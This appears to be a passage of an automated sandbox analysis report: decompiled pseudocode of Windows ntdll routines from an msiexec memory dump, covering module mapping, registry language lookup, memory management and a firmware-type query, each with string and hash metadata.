                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E04D17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				char _v24;
                              				signed int _t73;
                              				void* _t77;
                              				char* _t82;
                              				char* _t87;
                              				signed char* _t97;
                              				signed char _t102;
                              				intOrPtr _t107;
                              				signed char* _t108;
                              				intOrPtr _t112;
                              				intOrPtr _t124;
                              				intOrPtr _t125;
                              				intOrPtr _t126;
                              
                              				_t107 = __edx;
                              				_v12 = __ecx;
                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                              				_t124 = 0;
                              				_v20 = __edx;
                              				if(E04D1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                              					_t112 = _v8;
                              				} else {
                              					_t112 = 0;
                              					_v8 = 0;
                              				}
                              				if(_t112 != 0) {
                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                              						_t124 = 0xc000007b;
                              						goto L8;
                              					}
                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                              					 *(_t125 + 0x34) = _t73;
                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                              						goto L3;
                              					}
                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                              					_t124 = E04D0C9A4( *((intOrPtr*)(_t125 + 0x18)));
                              					if(_t124 < 0) {
                              						goto L8;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                              						L8:
                              						return _t124;
                              					}
                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                              							goto L5;
                              						}
                              						_t102 =  *0x4df5780; // 0x0
                              						if((_t102 & 0x00000003) != 0) {
                              							E04D85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                              							_t102 =  *0x4df5780; // 0x0
                              						}
                              						if((_t102 & 0x00000010) != 0) {
                              							asm("int3");
                              						}
                              						_t124 = 0xc0000428;
                              						goto L8;
                              					}
                              					L5:
                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                              						goto L8;
                              					}
                              					_t77 = _a4 - 0x40000003;
                              					if(_t77 == 0 || _t77 == 0x33) {
                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                              						if(E04D27D50() != 0) {
                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              						} else {
                              							_t82 = 0x7ffe0384;
                              						}
                              						_t108 = 0x7ffe0385;
                              						if( *_t82 != 0) {
                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                              								if(E04D27D50() == 0) {
                              									_t97 = 0x7ffe0385;
                              								} else {
                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              								}
                              								if(( *_t97 & 0x00000020) != 0) {
                              									E04D87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                              								}
                              							}
                              						}
                              						if(_a4 != 0x40000003) {
                              							L14:
                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                              							if(E04D27D50() != 0) {
                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              							} else {
                              								_t87 = 0x7ffe0384;
                              							}
                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                              								if(E04D27D50() != 0) {
                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              								}
                              								if(( *_t108 & 0x00000020) != 0) {
                              									E04D87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                              								}
                              							}
                              							goto L8;
                              						} else {
                              							_v16 = _t125 + 0x24;
                              							_t124 = E04D3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                              							if(_t124 < 0) {
                              								E04D0B1E1(_t124, 0x1490, 0, _v16);
                              								goto L8;
                              							}
                              							goto L14;
                              						}
                              					} else {
                              						goto L8;
                              					}
                              				}
                              			}

                              Strings
                              • minkernel\ntdll\ldrmap.c, xrefs: 04D698A2
                              • Could not validate the crypto signature for DLL %wZ, xrefs: 04D69891
                              • LdrpCompleteMapModule, xrefs: 04D69898
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                              • API String ID: 0-1676968949
                              • Opcode ID: ec190aed734eea31eaf02dc17b2d6a52de6c0f016cb234e4ea44c2b9c1cb9fc9
                              • Instruction ID: dfc61d0854f17915cce1ad72f7156e89559be1529992494d6eab6894cd5f0e6e
                              • Opcode Fuzzy Hash: ec190aed734eea31eaf02dc17b2d6a52de6c0f016cb234e4ea44c2b9c1cb9fc9
                              • Instruction Fuzzy Hash: 9F51BD71B04746ABE721CE58D994B2ABBE4FB01714F1405AAEC929B7F1D774F900CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E04D0E620(void* __ecx, short* __edx, short* _a4) {
                              				char _v16;
                              				char _v20;
                              				intOrPtr _v24;
                              				char* _v28;
                              				char _v32;
                              				char _v36;
                              				char _v44;
                              				signed int _v48;
                              				intOrPtr _v52;
                              				void* _v56;
                              				void* _v60;
                              				char _v64;
                              				void* _v68;
                              				void* _v76;
                              				void* _v84;
                              				signed int _t59;
                              				signed int _t74;
                              				signed short* _t75;
                              				signed int _t76;
                              				signed short* _t78;
                              				signed int _t83;
                              				short* _t93;
                              				signed short* _t94;
                              				short* _t96;
                              				void* _t97;
                              				signed int _t99;
                              				void* _t101;
                              				void* _t102;
                              
                              				_t80 = __ecx;
                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                              				_t96 = __edx;
                              				_v44 = __edx;
                              				_t78 = 0;
                              				_v56 = 0;
                              				if(__ecx == 0 || __edx == 0) {
                              					L28:
                              					_t97 = 0xc000000d;
                              				} else {
                              					_t93 = _a4;
                              					if(_t93 == 0) {
                              						goto L28;
                              					}
                              					_t78 = E04D0F358(__ecx, 0xac);
                              					if(_t78 == 0) {
                              						_t97 = 0xc0000017;
                              						L6:
                              						if(_v56 != 0) {
                              							_push(_v56);
                              							E04D495D0();
                              						}
                              						if(_t78 != 0) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                              						}
                              						return _t97;
                              					}
                              					E04D4FA60(_t78, 0, 0x158);
                              					_v48 = _v48 & 0x00000000;
                              					_t102 = _t101 + 0xc;
                              					 *_t96 = 0;
                              					 *_t93 = 0;
                              					E04D4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                              					_v36 = 0x18;
                              					_v28 =  &_v44;
                              					_v64 = 0;
                              					_push( &_v36);
                              					_push(0x20019);
                              					_v32 = 0;
                              					_push( &_v64);
                              					_v24 = 0x40;
                              					_v20 = 0;
                              					_v16 = 0;
                              					_t97 = E04D49600();
                              					if(_t97 < 0) {
                              						goto L6;
                              					}
                              					E04D4BB40(0,  &_v36, L"InstallLanguageFallback");
                              					_push(0);
                              					_v48 = 4;
                              					_t97 = L04D0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                              					if(_t97 >= 0) {
                              						if(_v52 != 1) {
                              							L17:
                              							_t97 = 0xc0000001;
                              							goto L6;
                              						}
                              						_t59 =  *_t78 & 0x0000ffff;
                              						_t94 = _t78;
                              						_t83 = _t59;
                              						if(_t59 == 0) {
                              							L19:
                              							if(_t83 == 0) {
                              								L23:
                              								E04D4BB40(_t83, _t102 + 0x24, _t78);
                              								if(L04D143C0( &_v48,  &_v64) == 0) {
                              									goto L17;
                              								}
                              								_t84 = _v48;
                              								 *_v48 = _v56;
                              								if( *_t94 != 0) {
                              									E04D4BB40(_t84, _t102 + 0x24, _t94);
                              									if(L04D143C0( &_v48,  &_v64) != 0) {
                              										 *_a4 = _v56;
                              									} else {
                              										_t97 = 0xc0000001;
                              										 *_v48 = 0;
                              									}
                              								}
                              								goto L6;
                              							}
                              							_t83 = _t83 & 0x0000ffff;
                              							while(_t83 == 0x20) {
                              								_t94 =  &(_t94[1]);
                              								_t74 =  *_t94 & 0x0000ffff;
                              								_t83 = _t74;
                              								if(_t74 != 0) {
                              									continue;
                              								}
                              								goto L23;
                              							}
                              							goto L23;
                              						} else {
                              							goto L14;
                              						}
                              						while(1) {
                              							L14:
                              							_t27 =  &(_t94[1]); // 0x2
                              							_t75 = _t27;
                              							if(_t83 == 0x2c) {
                              								break;
                              							}
                              							_t94 = _t75;
                              							_t76 =  *_t94 & 0x0000ffff;
                              							_t83 = _t76;
                              							if(_t76 != 0) {
                              								continue;
                              							}
                              							goto L23;
                              						}
                              						 *_t94 = 0;
                              						_t94 = _t75;
                              						_t83 =  *_t75 & 0x0000ffff;
                              						goto L19;
                              					}
                              				}
                              			}

                              Strings
                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04D0E68C
                              • InstallLanguageFallback, xrefs: 04D0E6DB
                              • @, xrefs: 04D0E6C0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                              • API String ID: 0-1757540487
                              • Opcode ID: 6c2ab011dff54db1b0d1da98b8706e5e745356e90d584a51d88e889b797d8a56
                              • Instruction ID: daa2deb701268b029bb37997c6733dc269f50229a1aef41cdb1ab704fc9378e0
                              • Opcode Fuzzy Hash: 6c2ab011dff54db1b0d1da98b8706e5e745356e90d584a51d88e889b797d8a56
                              • Instruction Fuzzy Hash: 96518DB2608355ABD714DF24E454B6AB3E8BF88714F0449AEF986D7240F734FA4487A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E04DCE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                              				signed int _v20;
                              				char _v24;
                              				signed int _v40;
                              				char _v44;
                              				intOrPtr _v48;
                              				signed int _v52;
                              				unsigned int _v56;
                              				char _v60;
                              				signed int _v64;
                              				char _v68;
                              				signed int _v72;
                              				void* __ebx;
                              				void* __edi;
                              				char _t87;
                              				signed int _t90;
                              				signed int _t94;
                              				signed int _t100;
                              				intOrPtr* _t113;
                              				signed int _t122;
                              				void* _t132;
                              				void* _t135;
                              				signed int _t139;
                              				signed int* _t141;
                              				signed int _t146;
                              				signed int _t147;
                              				void* _t153;
                              				signed int _t155;
                              				signed int _t159;
                              				char _t166;
                              				void* _t172;
                              				void* _t176;
                              				signed int _t177;
                              				intOrPtr* _t179;
                              
                              				_t179 = __ecx;
                              				_v48 = __edx;
                              				_v68 = 0;
                              				_v72 = 0;
                              				_push(__ecx[1]);
                              				_push( *__ecx);
                              				_push(0);
                              				_t153 = 0x14;
                              				_t135 = _t153;
                              				_t132 = E04DCBBBB(_t135, _t153);
                              				if(_t132 == 0) {
                              					_t166 = _v68;
                              					goto L43;
                              				} else {
                              					_t155 = 0;
                              					_v52 = 0;
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					_v56 = __ecx[1];
                              					if( *__ecx >> 8 < 2) {
                              						_t155 = 1;
                              						_v52 = 1;
                              					}
                              					_t139 = _a4;
                              					_t87 = (_t155 << 0xc) + _t139;
                              					_v60 = _t87;
                              					if(_t87 < _t139) {
                              						L11:
                              						_t166 = _v68;
                              						L12:
                              						if(_t132 != 0) {
                              							E04DCBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                              						}
                              						L43:
                              						if(_v72 != 0) {
                              							_push( *((intOrPtr*)(_t179 + 4)));
                              							_push( *_t179);
                              							_push(0x8000);
                              							E04DCAFDE( &_v72,  &_v60);
                              						}
                              						L46:
                              						return _t166;
                              					}
                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                              					asm("sbb edi, edi");
                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                              					if(_t90 != 0) {
                              						_push(0);
                              						_push(0x14);
                              						_push( &_v44);
                              						_push(3);
                              						_push(_t179);
                              						_push(0xffffffff);
                              						if(E04D49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                              							_push(_t139);
                              							E04DCA80D(_t179, 1, _v40, 0);
                              							_t172 = 4;
                              						}
                              					}
                              					_t141 =  &_v72;
                              					if(E04DCA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                              						_v64 = _a4;
                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                              						asm("sbb edi, edi");
                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                              						if(_t94 != 0) {
                              							_push(0);
                              							_push(0x14);
                              							_push( &_v24);
                              							_push(3);
                              							_push(_t179);
                              							_push(0xffffffff);
                              							if(E04D49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                              								_push(_t141);
                              								E04DCA80D(_t179, 1, _v20, 0);
                              								_t176 = 4;
                              							}
                              						}
                              						if(E04DCA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                              							goto L11;
                              						} else {
                              							_t177 = _v64;
                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                              							_t100 = _v52 + _v52;
                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                              							 *(_t132 + 0x10) = _t146;
                              							asm("bsf eax, [esp+0x18]");
                              							_v52 = _t100;
                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                              							_t47 =  &_a8;
                              							 *_t47 = _a8 & 0x00000001;
                              							if( *_t47 == 0) {
                              								E04D22280(_t179 + 0x30, _t179 + 0x30);
                              							}
                              							_t147 =  *(_t179 + 0x34);
                              							_t159 =  *(_t179 + 0x38) & 1;
                              							_v68 = 0;
                              							if(_t147 == 0) {
                              								L35:
                              								E04D1B090(_t179 + 0x34, _t147, _v68, _t132);
                              								if(_a8 == 0) {
                              									E04D1FFB0(_t132, _t177, _t179 + 0x30);
                              								}
                              								asm("lock xadd [eax], ecx");
                              								asm("lock xadd [eax], edx");
                              								_t132 = 0;
                              								_v72 = _v72 & 0;
                              								_v68 = _v72;
                              								if(E04D27D50() == 0) {
                              									_t113 = 0x7ffe0388;
                              								} else {
                              									_t177 = _v64;
                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              								}
                              								if( *_t113 == _t132) {
                              									_t166 = _v68;
                              									goto L46;
                              								} else {
                              									_t166 = _v68;
                              									E04DBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                              									goto L12;
                              								}
                              							} else {
                              								L23:
                              								while(1) {
                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                              										_t122 =  *_t147;
                              										if(_t159 == 0) {
                              											L32:
                              											if(_t122 == 0) {
                              												L34:
                              												_v68 = 0;
                              												goto L35;
                              											}
                              											L33:
                              											_t147 = _t122;
                              											continue;
                              										}
                              										if(_t122 == 0) {
                              											goto L34;
                              										}
                              										_t122 = _t122 ^ _t147;
                              										goto L32;
                              									}
                              									_t122 =  *(_t147 + 4);
                              									if(_t159 == 0) {
                              										L27:
                              										if(_t122 != 0) {
                              											goto L33;
                              										}
                              										L28:
                              										_v68 = 1;
                              										goto L35;
                              									}
                              									if(_t122 == 0) {
                              										goto L28;
                              									}
                              									_t122 = _t122 ^ _t147;
                              									goto L27;
                              								}
                              							}
                              						}
                              					}
                              					_v72 = _v72 & 0x00000000;
                              					goto L11;
                              				}
                              			}
                              0x04dce741
                              0x04dce739
                              0x00000000
                              0x00000000
                              0x04dce73b
                              0x00000000
                              0x04dce73b
                              0x04dce722
                              0x04dce720
                              0x04dce6b0
                              0x04dce618
                              0x00000000
                              0x04dce618

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `$`
                              • API String ID: 0-197956300
                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction ID: d886fee3c4fa80402315359cc7290cca2094c8da60f514ce128bc57078968051
                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction Fuzzy Hash: 3F9159B13443429BE724CE25C945B2BB7E6BF84714F14892DF999CB280E774F905CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E04D851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed short* _t63;
                              				signed int _t64;
                              				signed int _t65;
                              				signed int _t67;
                              				intOrPtr _t74;
                              				intOrPtr _t84;
                              				intOrPtr _t88;
                              				intOrPtr _t94;
                              				void* _t100;
                              				void* _t103;
                              				intOrPtr _t105;
                              				signed int _t106;
                              				short* _t108;
                              				signed int _t110;
                              				signed int _t113;
                              				signed int* _t115;
                              				signed short* _t117;
                              				void* _t118;
                              				void* _t119;
                              
                              				_push(0x80);
                              				_push(0x4de05f0);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                              				_t115 =  *(_t118 + 0xc);
                              				 *(_t118 - 0x7c) = _t115;
                              				 *((char*)(_t118 - 0x65)) = 0;
                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                              				_t113 = 0;
                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                              				_t100 = __ecx;
                              				if(_t100 == 0) {
                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                              					E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					 *((char*)(_t118 - 0x65)) = 1;
                              					_t63 =  *(_t118 - 0x90);
                              					_t101 = _t63[2];
                              					_t64 =  *_t63 & 0x0000ffff;
                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                              					L20:
                              					_t65 = _t64 >> 1;
                              					L21:
                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                              					if(_t108 == 0) {
                              						L27:
                              						 *_t115 = _t65 + 1;
                              						_t67 = 0xc0000023;
                              						L28:
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                              						L29:
                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                              						E04D853CA(0);
                              						return E04D5D130(0, _t113, _t115);
                              					}
                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                              							 *_t108 = 0;
                              						}
                              						goto L27;
                              					}
                              					 *_t115 = _t65;
                              					_t115 = _t65 + _t65;
                              					E04D4F3E0(_t108, _t101, _t115);
                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                              					_t67 = 0;
                              					goto L28;
                              				}
                              				_t103 = _t100 - 1;
                              				if(_t103 == 0) {
                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                              					_t74 = E04D23690(1, _t117, 0x4ce1810, _t118 - 0x74);
                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                              					_t101 = _t117[2];
                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                              					if(_t74 < 0) {
                              						_t64 =  *_t117 & 0x0000ffff;
                              						_t115 =  *(_t118 - 0x7c);
                              						goto L20;
                              					}
                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                              					_t115 =  *(_t118 - 0x7c);
                              					goto L21;
                              				}
                              				if(_t103 == 1) {
                              					_t105 = 4;
                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                              					_push(_t118 - 0x70);
                              					_push(0);
                              					_push(0);
                              					_push(_t105);
                              					_push(_t118 - 0x78);
                              					_push(0x6b);
                              					 *((intOrPtr*)(_t118 - 0x64)) = E04D4AA90();
                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                              					_t113 = L04D24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                              					if(_t113 != 0) {
                              						_push(_t118 - 0x70);
                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                              						_push(_t113);
                              						_push(4);
                              						_push(_t118 - 0x78);
                              						_push(0x6b);
                              						_t84 = E04D4AA90();
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                              						if(_t84 < 0) {
                              							goto L29;
                              						}
                              						_t110 = 0;
                              						_t106 = 0;
                              						while(1) {
                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                              							 *(_t118 - 0x88) = _t106;
                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                              								break;
                              							}
                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                              							_t106 = _t106 + 1;
                              						}
                              						_t88 = E04D8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                              						_t119 = _t119 + 0x1c;
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                              						if(_t88 < 0) {
                              							goto L29;
                              						}
                              						_t101 = _t118 - 0x3c;
                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                              						goto L21;
                              					}
                              					_t67 = 0xc0000017;
                              					goto L28;
                              				}
                              				_push(0);
                              				_push(0x20);
                              				_push(_t118 - 0x60);
                              				_push(0x5a);
                              				_t94 = E04D49860();
                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                              				if(_t94 < 0) {
                              					goto L29;
                              				}
                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                              					_t101 = L"Legacy";
                              					_push(6);
                              				} else {
                              					_t101 = L"UEFI";
                              					_push(4);
                              				}
                              				_pop(_t65);
                              				goto L21;
                              			}

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Legacy$UEFI
                              • API String ID: 2994545307-634100481
                              • Opcode ID: ac146a67ed419757c216816862543435c3b882981421d9acff6c20d3b633de11
                              • Instruction ID: 968d6ab888203cb54d6ec76d3fc1fc0c081a17bbae8d2595e0daa928c0cc98ac
                              • Opcode Fuzzy Hash: ac146a67ed419757c216816862543435c3b882981421d9acff6c20d3b633de11
                              • Instruction Fuzzy Hash: 7D516DB1A00608AFDB25EFA89950BBDBBF9FB48704F54402DE549EB251DB71E900CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E04D2B944(signed int* __ecx, char __edx) {
                              				signed int _v8;
                              				signed int _v16;
                              				signed int _v20;
                              				char _v28;
                              				signed int _v32;
                              				char _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				signed int* _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				intOrPtr _v68;
                              				intOrPtr _v72;
                              				intOrPtr _v76;
                              				char _v77;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t65;
                              				intOrPtr _t67;
                              				intOrPtr _t68;
                              				char* _t73;
                              				intOrPtr _t77;
                              				intOrPtr _t78;
                              				signed int _t82;
                              				intOrPtr _t83;
                              				void* _t87;
                              				char _t88;
                              				intOrPtr* _t89;
                              				intOrPtr _t91;
                              				void* _t97;
                              				intOrPtr _t100;
                              				void* _t102;
                              				void* _t107;
                              				signed int _t108;
                              				intOrPtr* _t112;
                              				void* _t113;
                              				intOrPtr* _t114;
                              				intOrPtr _t115;
                              				intOrPtr _t116;
                              				intOrPtr _t117;
                              				signed int _t118;
                              				void* _t130;
                              
                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                              				_v8 =  *0x4dfd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                              				_t112 = __ecx;
                              				_v77 = __edx;
                              				_v48 = __ecx;
                              				_v28 = 0;
                              				_t5 = _t112 + 0xc; // 0x575651ff
                              				_t105 =  *_t5;
                              				_v20 = 0;
                              				_v16 = 0;
                              				if(_t105 == 0) {
                              					_t50 = _t112 + 4; // 0x5de58b5b
                              					_t60 =  *__ecx |  *_t50;
                              					if(( *__ecx |  *_t50) != 0) {
                              						 *__ecx = 0;
                              						__ecx[1] = 0;
                              						if(E04D27D50() != 0) {
                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t65 = 0x7ffe0386;
                              						}
                              						if( *_t65 != 0) {
                              							E04DD8CD6(_t112);
                              						}
                              						_push(0);
                              						_t52 = _t112 + 0x10; // 0x778df98b
                              						_push( *_t52);
                              						_t60 = E04D49E20();
                              					}
                              					L20:
                              					_pop(_t107);
                              					_pop(_t113);
                              					_pop(_t87);
                              					return E04D4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                              				}
                              				_t8 = _t112 + 8; // 0x8b000cc2
                              				_t67 =  *_t8;
                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                              				_t108 =  *(_t67 + 0x14);
                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                              				_t105 = 0x2710;
                              				asm("sbb eax, edi");
                              				_v44 = _t88;
                              				_v52 = _t108;
                              				_t60 = E04D4CE00(_t97, _t68, 0x2710, 0);
                              				_v56 = _t60;
                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                              					L3:
                              					 *(_t112 + 0x44) = _t60;
                              					_t105 = _t60 * 0x2710 >> 0x20;
                              					 *_t112 = _t88;
                              					 *(_t112 + 4) = _t108;
                              					_v20 = _t60 * 0x2710;
                              					_v16 = _t60 * 0x2710 >> 0x20;
                              					if(_v77 != 0) {
                              						L16:
                              						_v36 = _t88;
                              						_v32 = _t108;
                              						if(E04D27D50() != 0) {
                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t73 = 0x7ffe0386;
                              						}
                              						if( *_t73 != 0) {
                              							_t105 = _v40;
                              							E04DD8F6A(_t112, _v40, _t88, _t108);
                              						}
                              						_push( &_v28);
                              						_push(0);
                              						_push( &_v36);
                              						_t48 = _t112 + 0x10; // 0x778df98b
                              						_push( *_t48);
                              						_t60 = E04D4AF60();
                              						goto L20;
                              					} else {
                              						_t89 = 0x7ffe03b0;
                              						do {
                              							_t114 = 0x7ffe0010;
                              							do {
                              								_t77 =  *0x4df8628; // 0x0
                              								_v68 = _t77;
                              								_t78 =  *0x4df862c; // 0x0
                              								_v64 = _t78;
                              								_v72 =  *_t89;
                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                              								while(1) {
                              									_t105 =  *0x7ffe000c;
                              									_t100 =  *0x7ffe0008;
                              									if(_t105 ==  *_t114) {
                              										goto L8;
                              									}
                              									asm("pause");
                              								}
                              								L8:
                              								_t89 = 0x7ffe03b0;
                              								_t115 =  *0x7ffe03b0;
                              								_t82 =  *0x7FFE03B4;
                              								_v60 = _t115;
                              								_t114 = 0x7ffe0010;
                              								_v56 = _t82;
                              							} while (_v72 != _t115 || _v76 != _t82);
